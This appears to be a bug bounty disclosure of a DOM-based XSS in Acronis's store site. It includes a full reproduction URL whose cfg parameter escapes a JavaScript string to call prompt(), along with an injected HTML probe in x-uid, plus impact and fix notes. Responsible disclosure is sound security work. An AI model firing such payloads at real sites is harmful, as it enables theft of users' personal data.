DOM based XSS in store.acronis.com/<id>/purl-corporate-standard-IT [cfg parameter]

## Summary Hi Acronis team, i found a DOM based XSS in store.acronis.com, this vulnerability arise from a missing escape for the \ character. ## Steps To Reproduce 1. go to: https://store.acronis.com/837/purl-corporate-standard-IT?cart=201591&deliveryEmail=f_m%2B5%40wearehackerone.com&deliveryFirstname=fmfm&deliveryEmailRetype=f_m%2B5%40wearehackerone.com&deliveryPhone1=fmfm&deliveryLastname=fmfmfm&x-uid=%22%3e%3ctestxss&quantity_201591=1&recommendation=cloud_20off&recommendation=ACPPLP&x-page=https://www.acronis.com/it-it/business/backup/server/purchasing/&tracking=&x-segment=corporate&cfg=\\ciao%27}];prompt();var%20asd=[{%27foo%27:%27bar 2. a prompt appear {F965980} ## Impact since it's in the store subdomain, this can lead to PII stealing ## Recommendations escape the \ character in \\ ## Impact since it's in the store subdomain, this can lead to PII stealing